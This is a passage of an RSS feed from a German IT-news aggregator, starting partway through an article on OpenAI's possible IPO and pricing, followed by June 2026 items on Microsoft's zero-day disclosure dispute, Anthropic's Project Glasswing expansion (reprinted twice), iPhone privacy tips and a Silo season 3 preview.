<p>With many reports suggesting OpenAI is currently operating at a loss, Amos sees the company revamping its pricing models after an IPO. The company could, for example, move to premium pricing for advanced capabilities such as higher-end models, agentic workflows, and advanced orchestration.</p>



<p>In response, some users will adopt <a href="https://www.cio.com/article/3839075/finops-breaks-out-of-the-cloud.html">AI FinOps</a> solutions to balance consumption and business value, Amos predicts. “We will see some price increases, and I believe that we will have new tools or licensing constructs to manage the cost of the ecosystem,” he adds.</p>



<h2 class="wp-block-heading">New pricing model</h2>



<p>Days before announcing its IPO, Anthropic unveiled a <a href="https://www.infoworld.com/article/4171274/anthropic-puts-claude-agents-on-a-meter-across-its-subscriptions.html">new metered pricing model</a> for some of its products.</p>



<p>Meanwhile, OpenAI’s new <a href="https://www.cnbc.com/2026/05/19/openai-announces-new-guaranteed-capacity-offering-for-customers-to-secure-compute.html" rel="nofollow">Guaranteed Capacity subscription model</a> points to a new pricing philosophy that moves the focus away from selling flexible API tokens and toward a predictable, contractually locked enterprise utility requiring companies to make upfront multi-year spending commitments, notes <a href="https://euginajordan.com/" rel="nofollow">Eugina Jordan</a>, CEO and cofounder at unified intelligence provider YOUnifiedAI.</p>



<p>OpenAI also <a href="https://www.cio.com/article/4169759/openais-new-ai-consulting-offering-raises-questions-of-trust-strategy.html?utm=hybrid_search">announced a new consulting company</a> in May.</p>



<p>Becoming a publicly traded company will likely increase pressure to revamp pricing, Jordan says.</p>



<p>“An OpenAI IPO would drastically reshape the landscape for IT leaders, shifting the company from an agile tech pioneer to a public entity tethered to Wall Street’s quarterly earnings demands,” she adds. “While a massive influx of public capital could fund the robust infrastructure needed to stabilize enterprise products, the immediate reality for users is a sharp pivot toward aggressive monetization.”</p>



<p>However, there’s some good news for enterprise AI users as several major competitors have emerged since OpenAI opened the AI floodgates with its release of the first version of ChatGPT in late 2022, Jordan says. Anthropic has rapidly become the default choice for enterprise developers and deep coding, Google’s Gemini has leveraged its unmatched workspace distribution, and Mistral is securing the European open-source stronghold, she notes.</p>



<p>“This push for predictable enterprise revenue comes at a time when OpenAI is facing a fragmented, highly aggressive competitive landscape where being the first mover is no longer a guarantee of winning,” she adds. “Much like the historic shifts where Yahoo lost to Google or MySpace fell to Facebook, OpenAI is finding that pioneering a technology is very different from scaling it, and an IPO will force them to mature rapidly, just as their competitors are successfully chipping away at their enterprise armor.”</p>



<p>SmartTech Research’s Vena also sees several major competitors, including Google, xAl, and Meta.</p>



<p>“From my perspective, OpenAI is still a leader, but it no longer owns the AI narrative uncontested,” he says. “OpenAI still has brand gravity and product momentum, but the next phase will be less about who has the flashiest demo and more about who can deliver durable, secure, cost-effective AI at scale.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Streamer Has Convinced the Internet Guy Fieri Never Swallows Food on TV]]></title>
<description><![CDATA[A video creator known as Doctor Spaghetti has scrutinized hours of Diners, Drive-Ins and Dives to get to the bottom of an explosive culinary conspiracy theory.]]></description>
<link>https://tsecurity.de/de/3572092/it-nachrichten/this-streamer-has-convinced-the-internet-guy-fieri-never-swallows-food-on-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572092/it-nachrichten/this-streamer-has-convinced-the-internet-guy-fieri-never-swallows-food-on-tv/</guid>
<pubDate>Thu, 04 Jun 2026 11:47:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A video creator known as Doctor Spaghetti has scrutinized hours of Diners, Drive-Ins and Dives to get to the bottom of an explosive culinary conspiracy theory.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to manage your privacy on iPhone and iPad]]></title>
<description><![CDATA[Social media sites and advertisers aren't actually using your iPhone microphone to spy on you, but what's happening is complex. Here's how to limit the amount of access Big Tech has to your data, by performing a quick privacy audit.The iPhone can protect your privacy, and limit what it sends to a...]]></description>
<link>https://tsecurity.de/de/3571332/ios-mac-os/how-to-manage-your-privacy-on-iphone-and-ipad/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571332/ios-mac-os/how-to-manage-your-privacy-on-iphone-and-ipad/</guid>
<pubDate>Thu, 04 Jun 2026 05:06:52 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Social media sites and advertisers aren't actually using your <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhone</a> microphone to spy on you, but what's happening is complex. Here's how to limit the amount of access Big Tech has to your data, by performing a quick privacy audit.<br><br><div><img src="https://photos5.appleinsider.com/gallery/42127-81652-Tracked-Ad-Spot-xl.jpg" alt="A man holding an iPhone up to the camera with the caption 'Privacy, that's iPhone'" height="720"><br><span>The iPhone can protect your privacy, and limit what it sends to advertisers. Here's how - Image credit: Apple</span></div><br>It happens to all of us. You'll be talking about something, and then later you'll see an advertisement pop up on Facebook or Instagram. It couldn't be a coincidence, right?<br><br>It might feel like you're being actively spied on, but you aren't.<br><br><br> <a href="https://appleinsider.com/inside/iphone/tips/how-to-manage-your-privacy-on-iphone-and-ipad?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244528?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Tries to Calm Legal Threat Fears After Zero-Day Disclosure Backlash]]></title>
<description><![CDATA[Microsoft has responded to backlash over its initial threats of legal action against researchers who publicly disclose zero-day vulnerabilities without coordinated notification. The controversy concerns a researcher known online as Chaotic Eclipse and Nightmare Eclipse, who in recent weeks disclo...]]></description>
<link>https://tsecurity.de/de/3569142/it-security-nachrichten/microsoft-tries-to-calm-legal-threat-fears-after-zero-day-disclosure-backlash/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569142/it-security-nachrichten/microsoft-tries-to-calm-legal-threat-fears-after-zero-day-disclosure-backlash/</guid>
<pubDate>Wed, 03 Jun 2026 12:24:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft has responded to backlash over its initial threats of legal action against researchers who publicly disclose zero-day vulnerabilities without coordinated notification. The controversy concerns a researcher known online as Chaotic Eclipse and Nightmare Eclipse, who in recent weeks disclosed the details and proof-of-concept (PoC) exploits for several unpatched vulnerabilities affecting Microsoft products.  Details remain […]</p>
<p>The post <a href="https://www.securityweek.com/microsoft-tries-to-calm-legal-threat-fears-after-zero-day-disclosure-backlash/">Microsoft Tries to Calm Legal Threat Fears After Zero-Day Disclosure Backlash</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Tries to Calm Legal Threat Fears After Zero-Day Disclosure Backlash]]></title>
<description><![CDATA[Microsoft has responded to backlash over its initial threats of legal action against researchers who publicly disclose zero-day vulnerabilities without coordinated notification. The controversy concerns a researcher known online as Chaotic Eclipse and Nightmare Eclipse, who in recent weeks disclo...]]></description>
<link>https://tsecurity.de/de/3569136/it-security-nachrichten/microsoft-tries-to-calm-legal-threat-fears-after-zero-day-disclosure-backlash/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569136/it-security-nachrichten/microsoft-tries-to-calm-legal-threat-fears-after-zero-day-disclosure-backlash/</guid>
<pubDate>Wed, 03 Jun 2026 12:24:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft has responded to backlash over its initial threats of legal action against researchers who publicly disclose zero-day vulnerabilities without coordinated notification. The controversy concerns a researcher known online as Chaotic Eclipse and Nightmare Eclipse, who in recent weeks disclosed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/microsoft-tries-to-calm-legal-threat-fears-after-zero-day-disclosure-backlash/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/microsoft-tries-to-calm-legal-threat-fears-after-zero-day-disclosure-backlash/">Microsoft Tries to Calm Legal Threat Fears After Zero-Day Disclosure Backlash</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-03 12h : 6 posts]]></title>
<description><![CDATA[6 posts were published in the last hour 10:4 : Microsoft Tries to Calm Legal Threat Fears After Zero-Day Disclosure Backlash 10:4 : New HTTP/2 Bomb Vulnerability Allows Remote DoS on NGINX, Apache, IIS, Envoy & Cloudflare 9:32 : Meta…
Read more →
The post IT Security News Hourly Summary 2026-06-0...]]></description>
<link>https://tsecurity.de/de/3569135/it-security-nachrichten/it-security-news-hourly-summary-2026-06-03-12h-6-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569135/it-security-nachrichten/it-security-news-hourly-summary-2026-06-03-12h-6-posts/</guid>
<pubDate>Wed, 03 Jun 2026 12:24:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>6 posts were published in the last hour 10:4 : Microsoft Tries to Calm Legal Threat Fears After Zero-Day Disclosure Backlash 10:4 : New HTTP/2 Bomb Vulnerability Allows Remote DoS on NGINX, Apache, IIS, Envoy &amp; Cloudflare 9:32 : Meta…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-03-12h-6-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-03-12h-6-posts/">IT Security News Hourly Summary 2026-06-03 12h : 6 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic grants Project Glasswing access to 150 more companies, with a focus on critical infrastructure]]></title>
<description><![CDATA[Anthropic on Tuesday announced that it was adding 150 more companies to its Project Glasswing AI-based vulnerability hunting initiative, with a particular focus on critical infrastructure companies including those involved in “power, water, healthcare, communications and hardware.”



Analysts an...]]></description>
<link>https://tsecurity.de/de/3567951/it-security-nachrichten/anthropic-grants-project-glasswing-access-to-150-more-companies-with-a-focus-on-critical-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567951/it-security-nachrichten/anthropic-grants-project-glasswing-access-to-150-more-companies-with-a-focus-on-critical-infrastructure/</guid>
<pubDate>Wed, 03 Jun 2026 02:51:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Anthropic on Tuesday announced that it was adding 150 more companies to its Project Glasswing AI-based vulnerability hunting initiative, with a particular focus on critical infrastructure companies including those involved in “power, water, healthcare, communications and hardware.”</p>



<p>Analysts and security vendors agreed that the move is a positive step, noting that the more companies involved in bug identification, the better. But the bigger background issue is a practical one: the bottleneck problem. </p>



<p>If Project Glasswing, and similar projects from other major AI vendors, increase the stream of vulnerability identifications by 10 or more times, will vendors be able to triage and patch them in a timely manner? Vendors have historically been notoriously slow to patch known security issues. Microsoft, for example, <a href="https://www.csoonline.com/article/4178869/microsoft-and-security-researchers-dueling-posts-about-cybersecurity-disclosures-get-nasty.html" target="_blank">recently argued with a security researcher </a>who went public with holes because he felt that Microsoft was too slow in addressing them. </p>



<p>And even if those vendors can keep up, are enterprise SOCs going to be able to keep up with the avalanche of patches? And if extensive automation is deployed to generate those patches, will CISOs trust them enough to let them be deployed without manual verification? Trust is not a common CISO trait.</p>



<p>“What each partner has in common is that a successful attack on their codebase could be catastrophic. For most partners, we estimate that a major attack could affect more than 100 million people, with important ramifications for both global and national security,” <a href="https://www.anthropic.com/news/expanding-project-glasswing" target="_blank" rel="noreferrer noopener">Anthropic said in its blog post</a> announcing the new participants. “This expansion is the next step toward our long-term goals: for AI to make all software more secure, and for us to help the industry adjust to how AI could change many of the core assumptions of cybersecurity.”</p>



<p><a href="https://www.csoonline.com/article/4176865/project-glasswing-has-uncovered-10000-vulnerabilities-anthropic.html" target="_blank">Glasswing </a>was announced on April 7 and was initially supported by AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorganChase, the Linux Foundation, Microsoft, NVIDIA, and Palo Alto Networks. Okta later confirmed that it was also involved. </p>



<h2 class="wp-block-heading">The patch bottleneck</h2>



<p>The bottleneck problem is a difficult one to solve, given that even the largest vendors can only cost-justify so many resources for patching security holes and distributing those patches.</p>



<p>“The biggest issue is adaptability: once a vulnerability or weakness is found, defenders have to validate it, prioritize it, and fix it before attackers can operationalize the same insight. And that validation step matters,” said <a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai. “While testing the tool ourselves, we saw a lot of false positives, which means organizations cannot simply treat every finding as immediately actionable. They need the ability to separate signal from noise quickly, then adapt their processes, engineering workflows, and patching pipelines around the real issues.”</p>



<p>“The most important metric for organizations to track may not just be how many vulnerabilities are found, but how long it takes them to adapt once a credible issue is identified. For some organizations, that adaptation cycle can still take months,” he added. “Reducing that time-to-adapt is what will determine whether AI-assisted vulnerability discovery actually improves defense or just increases the speed and volume of security noise.”</p>



<h2 class="wp-block-heading">A remediation problem</h2>



<p><a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence, agreed that the Glasswing expansion may simply demonstrate to CISOs how much the security hole problem is shifting, not shrinking. </p>



<p>“It’s no secret that cybersecurity has been treated as a vulnerability discovery problem. AI is proving that it was really a remediation problem all along. The industry already struggles to validate, prioritize, patch, test, and deploy fixes fast enough. It may even be worse if security teams own the vulnerability identification and the IT teams, or the business teams, own the patching itself,” Greis said. “If AI can identify vulnerabilities 10x or 100x faster than humans, the bottleneck simply moves downstream. Organizations may soon find themselves in the uncomfortable position of knowing about far more vulnerabilities than they can realistically address. AI is turning cybersecurity from a visibility problem into an execution problem.”</p>



<p>Greis added a frightening prediction: “AI could make organizations simultaneously more secure and more overwhelmed, if that’s possible. They’ll have unprecedented visibility into their risk, but they’ll also discover just how large that risk really is.”</p>



<h2 class="wp-block-heading">Trust required</h2>



<p><a href="https://my.idc.com/getdoc.jsp?containerId=PRF005722" target="_blank" rel="noreferrer noopener">Grace Trinidad</a>, research director for AI security at IDC, said the bottleneck problem at the enterprise needs to be addressed via extensive automation. But given the lack of trust by cybersecurity staff, vendors must have a rigorous method for producing a numerical confidence score for every patch. </p>



<p>“Having a confidence score accompanying these patches is a new concept. There must be an ability of the enterprise to identify, triage and address the vulnerabilities that are specific to their environment,” Trinidad said. “We are learning a skillset that we are not ready for: How do we trust automated technologies? Given that we are having to move at this speed, that trust is going to get broken. Confidence scoring is a discipline that needs transparency. Don’t make the confidence [explanation] so complicated that you can’t explain it to a human being.”</p>



<p>Trinidad also noted that the Anthropic announcement pointed out that each of the 150 new participants, in Anthropic’s phrasing, “will need to meet our security requirements before they gain access.”</p>



<p>Trinidad said the security requirement claim doesn’t build confidence, because “nobody knows what those security requirements are.”</p>



<p>One possible solution is for security vendors to use high-trust third parties so that they are not seen as ‘grading their own homework’. Enterprise software vendor Workday is using a similar third-party approach, relying on trusted services that use public standards such as Mitre ATLAS to validate the security and compliance of AI agents using its platform. <a href="https://www.cio.com/article/4179876/workday-launches-agent-passport-to-test-and-monitor-ai-agents-in-the-enterprise.html" target="_blank">Workday’s approach</a> deals with security checks and not reliability scores, but the idea could potentially be tweaked. </p>



<h2 class="wp-block-heading">Expansion creates security concerns</h2>



<p><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was more skeptical about what Glasswing will ultimately be able to accomplish by adding 150 more participants.</p>



<p>“The entire point of Project Glasswing was to allow Anthropic to work closely with a small, fully vetted group of vendors to develop stronger defenses against the cybersecurity risks posed by what was, and is, an entirely new LLM class that would otherwise pose unacceptable risks to existing protective technologies and protocols,” Levy said. “Expanding access into the hundreds may very well bring in more minds to build better defensive measures, but it simultaneously introduces significant concerns around potential leaks. And this from a company that has already reported two leaks involving this same model.”</p>



<p>Levy added, “in an ideal world, Anthropic would announce alongside this major expansion a parallel effort to tighten internal security protocols to ensure the code doesn’t fall into the wrong hands. Bringing in a much larger cohort of researchers signals to potential attackers that they will soon have a larger pool of potential targets, and fails to allay fears of future breaches.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic grants Project Glasswing access to 150 more companies, with a focus on critical infrastructure]]></title>
<description><![CDATA[Anthropic on Tuesday announced that it was adding 150 more companies to its Project Glasswing AI-based vulnerability hunting initiative, with a particular focus on critical infrastructure companies including those involved in “power, water, healthcare, communications and hardware.”



Analysts an...]]></description>
<link>https://tsecurity.de/de/3567949/it-nachrichten/anthropic-grants-project-glasswing-access-to-150-more-companies-with-a-focus-on-critical-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567949/it-nachrichten/anthropic-grants-project-glasswing-access-to-150-more-companies-with-a-focus-on-critical-infrastructure/</guid>
<pubDate>Wed, 03 Jun 2026 02:47:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Anthropic on Tuesday announced that it was adding 150 more companies to its Project Glasswing AI-based vulnerability hunting initiative, with a particular focus on critical infrastructure companies including those involved in “power, water, healthcare, communications and hardware.”</p>



<p>Analysts and security vendors agreed that the move is a positive step, noting that the more companies involved in bug identification, the better. But the bigger background issue is a practical one: the bottleneck problem. </p>



<p>If Project Glasswing, and similar projects from other major AI vendors, increase the stream of vulnerability identifications by 10 or more times, will vendors be able to triage and patch them in a timely manner? Vendors have historically been notoriously slow to patch known security issues. Microsoft, for example, <a href="https://www.csoonline.com/article/4178869/microsoft-and-security-researchers-dueling-posts-about-cybersecurity-disclosures-get-nasty.html" target="_blank">recently argued with a security researcher </a>who went public with holes because he felt that Microsoft was too slow in addressing them. </p>



<p>And even if those vendors can keep up, are enterprise SOCs going to be able to keep up with the avalanche of patches? And if extensive automation is deployed to generate those patches, will CISOs trust them enough to let them be deployed without manual verification? Trust is not a common CISO trait.</p>



<p>“What each partner has in common is that a successful attack on their codebase could be catastrophic. For most partners, we estimate that a major attack could affect more than 100 million people, with important ramifications for both global and national security,” <a href="https://www.anthropic.com/news/expanding-project-glasswing" target="_blank" rel="nofollow">Anthropic said in its blog post</a> announcing the new participants. “This expansion is the next step toward our long-term goals: for AI to make all software more secure, and for us to help the industry adjust to how AI could change many of the core assumptions of cybersecurity.”</p>



<p><a href="https://www.csoonline.com/article/4176865/project-glasswing-has-uncovered-10000-vulnerabilities-anthropic.html" target="_blank">Glasswing </a>was announced on April 7 and was initially supported by AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorganChase, the Linux Foundation, Microsoft, NVIDIA, and Palo Alto Networks. Okta later confirmed that it was also involved. </p>



<h2 class="wp-block-heading">The patch bottleneck</h2>



<p>The bottleneck problem is a difficult one to solve, given that even the largest vendors can only cost-justify so many resources for patching security holes and distributing those patches.</p>



<p>“The biggest issue is adaptability: once a vulnerability or weakness is found, defenders have to validate it, prioritize it, and fix it before attackers can operationalize the same insight. And that validation step matters,” said <a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="nofollow">Tom Findling</a>, CEO of Conifers.ai. “While testing the tool ourselves, we saw a lot of false positives, which means organizations cannot simply treat every finding as immediately actionable. They need the ability to separate signal from noise quickly, then adapt their processes, engineering workflows, and patching pipelines around the real issues.”</p>



<p>“The most important metric for organizations to track may not just be how many vulnerabilities are found, but how long it takes them to adapt once a credible issue is identified. For some organizations, that adaptation cycle can still take months,” he added. “Reducing that time-to-adapt is what will determine whether AI-assisted vulnerability discovery actually improves defense or just increases the speed and volume of security noise.”</p>



<h2 class="wp-block-heading">A remediation problem</h2>



<p><a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="nofollow">Justin Greis</a>, CEO of consulting firm Acceligence, agreed that the Glasswing expansion may simply demonstrate to CISOs how much the security hole problem is shifting, not shrinking. </p>



<p>“It’s no secret that cybersecurity has been treated as a vulnerability discovery problem. AI is proving that it was really a remediation problem all along. The industry already struggles to validate, prioritize, patch, test, and deploy fixes fast enough. It may even be worse if security teams own the vulnerability identification and the IT teams, or the business teams, own the patching itself,” Greis said. “If AI can identify vulnerabilities 10x or 100x faster than humans, the bottleneck simply moves downstream. Organizations may soon find themselves in the uncomfortable position of knowing about far more vulnerabilities than they can realistically address. AI is turning cybersecurity from a visibility problem into an execution problem.”</p>



<p>Greis added a frightening prediction: “AI could make organizations simultaneously more secure and more overwhelmed, if that’s possible. They’ll have unprecedented visibility into their risk, but they’ll also discover just how large that risk really is.”</p>



<h2 class="wp-block-heading">Trust required</h2>



<p><a href="https://my.idc.com/getdoc.jsp?containerId=PRF005722" target="_blank" rel="nofollow">Grace Trinidad</a>, research director for AI security at IDC, said the bottleneck problem at the enterprise needs to be addressed via extensive automation. But given the lack of trust by cybersecurity staff, vendors must have a rigorous method for producing a numerical confidence score for every patch. </p>



<p>“Having a confidence score accompanying these patches is a new concept. There must be an ability of the enterprise to identify, triage and address the vulnerabilities that are specific to their environment,” Trinidad said. “We are learning a skillset that we are not ready for: How do we trust automated technologies? Given that we are having to move at this speed, that trust is going to get broken. Confidence scoring is a discipline that needs transparency. Don’t make the confidence [explanation] so complicated that you can’t explain it to a human being.”</p>



<p>Trinidad also noted that the Anthropic announcement pointed out that each of the 150 new participants, in Anthropic’s phrasing, “will need to meet our security requirements before they gain access.”</p>



<p>Trinidad said the security requirement claim doesn’t build confidence, because “nobody knows what those security requirements are.”</p>



<p>One possible solution is for security vendors to use high-trust third parties so that they are not seen as ‘grading their own homework’. Enterprise software vendor Workday is using a similar third-party approach, relying on trusted services that use public standards such as Mitre ATLAS to validate the security and compliance of AI agents using its platform. <a href="https://www.cio.com/article/4179876/workday-launches-agent-passport-to-test-and-monitor-ai-agents-in-the-enterprise.html" target="_blank">Workday’s approach</a> deals with security checks and not reliability scores, but the idea could potentially be tweaked. </p>



<h2 class="wp-block-heading">Expansion creates security concerns</h2>



<p><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="nofollow">Carmi Levy</a>, an independent technology analyst, was more skeptical about what Glasswing will ultimately be able to accomplish by adding 150 more participants.</p>



<p>“The entire point of Project Glasswing was to allow Anthropic to work closely with a small, fully vetted group of vendors to develop stronger defenses against the cybersecurity risks posed by what was, and is, an entirely new LLM class that would otherwise pose unacceptable risks to existing protective technologies and protocols,” Levy said. “Expanding access into the hundreds may very well bring in more minds to build better defensive measures, but it simultaneously introduces significant concerns around potential leaks. And this from a company that has already reported two leaks involving this same model.”</p>



<p>Levy added, “in an ideal world, Anthropic would announce alongside this major expansion a parallel effort to tighten internal security protocols to ensure the code doesn’t fall into the wrong hands. Bringing in a much larger cohort of researchers signals to potential attackers that they will soon have a larger pool of potential targets, and fails to allay fears of future breaches.”</p>



<p><em>This article originally appeared on <a href="https://www.csoonline.com/article/4180265/anthropic-grants-project-glasswing-access-to-150-more-companies-with-a-focus-on-critical-infrastructure.html" target="_blank">CSOonline</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA['A new approach': Microsoft CEO claims its "AI Superfactory" will use the same amount of water each year as a neighborhood restaurant]]></title>
<description><![CDATA[As concerns rise over data centers, Microsoft CEO Satya Nadella looks to allay fears.]]></description>
<link>https://tsecurity.de/de/3567834/it-nachrichten/a-new-approach-microsoft-ceo-claims-its-ai-superfactory-will-use-the-same-amount-of-water-each-year-as-a-neighborhood-restaurant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567834/it-nachrichten/a-new-approach-microsoft-ceo-claims-its-ai-superfactory-will-use-the-same-amount-of-water-each-year-as-a-neighborhood-restaurant/</guid>
<pubDate>Wed, 03 Jun 2026 01:17:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As concerns rise over data centers, Microsoft CEO Satya Nadella looks to allay fears.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Reveals ‘Silo’ Season 3 Trailer and Weekly Release Schedule]]></title>
<description><![CDATA[Apple TV has released the trailer for Silo season 3, giving fans a closer look at Juliette Nichols’ next fight inside the underground world. The hit sci-fi drama returns on Friday, July 3, 2026, with Rebecca Ferguson back as Juliette after the explosive events of season 2.



The new season conti...]]></description>
<link>https://tsecurity.de/de/3567277/ios-mac-os/apple-tv-reveals-silo-season-3-trailer-and-weekly-release-schedule/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567277/ios-mac-os/apple-tv-reveals-silo-season-3-trailer-and-weekly-release-schedule/</guid>
<pubDate>Tue, 02 Jun 2026 20:25:04 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has released the trailer for Silo season 3, giving fans a closer look at Juliette Nichols’ next fight inside the underground world. The hit sci-fi drama returns on Friday, July 3, 2026, with Rebecca Ferguson back as Juliette after the explosive events of season 2.



The new season continues the story of 10,000 people living inside a massive underground silo, where asking the wrong questions can still be deadly. This time, the show is also going deeper into the past, showing how the silos became part of humanity’s future.



Silo season 3 release details




Series: Silo season 3



Genre: Sci-fi drama, dystopian thriller



Streaming on: Apple TV



Start date: Friday, July 3, 2026



Finale date: Friday, September 4, 2026



Episodes: 10



Release schedule: One new episode every Friday



Main cast: Rebecca Ferguson, Jessica Henwick, Ashley Zukerman, Colin Hanks





https://www.youtube.com/watch?v=BLBvbMtjyAQ




Plot



Spoiler warning for Silo season 2.



Silo season 3 picks up after Juliette survives her forced cleaning, but she does not return unchanged. She comes back with memory loss while the silo tries to recover from rebellion and fear. That gives the new season a sharper emotional hook, because Juliette is no longer just fighting the system. She is also fighting to understand herself again.



The season also moves into the “Before Times,” where journalist Helen Drew and Congressman Daniel Keene uncover a conspiracy that leads to irreversible consequences. This part of the story should finally give viewers more answers about why the silos were built and who benefited from keeping people in the dark.



What makes this season more interesting is the dual timeline. The present-day story deals with survival, control, and Juliette’s broken memory. The past storyline looks at the decisions that created the world she is trapped in. For viewers who have waited for bigger answers, season 3 looks like the point where the show starts connecting the mystery with its origin.



FAQs



When does Silo season 3 premiere? Silo season 3 premieres on Friday, July 3, 2026, on Apple TV.  How many episodes are in Silo season 3? Silo season 3 has 10 episodes.  When is the Silo season 3 finale? The finale is scheduled for Friday, September 4, 2026.  Is Silo season 3 the final season? No. Apple has already renewed Silo for a fourth and final season.  What is Silo based on? The series is based on Hugh Howey’s bestselling Silo book trilogy.  What is Silo season 3 about? Season 3 follows Juliette after she survives cleaning and returns with memory loss. It also explores the “Before Times,” where a journalist and a congressman uncover a conspiracy tied to the creation of the silos.  



Apple TV costs $12.99 per month in the U.S., with a yearly plan also available. Silo season 3 looks like one of the service’s biggest sci-fi releases of 2026, especially for viewers waiting for answers about the world outside and the truth behind the silos.



What do you plan to watch on Apple TV next? Let us know in the comments.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,11ms -->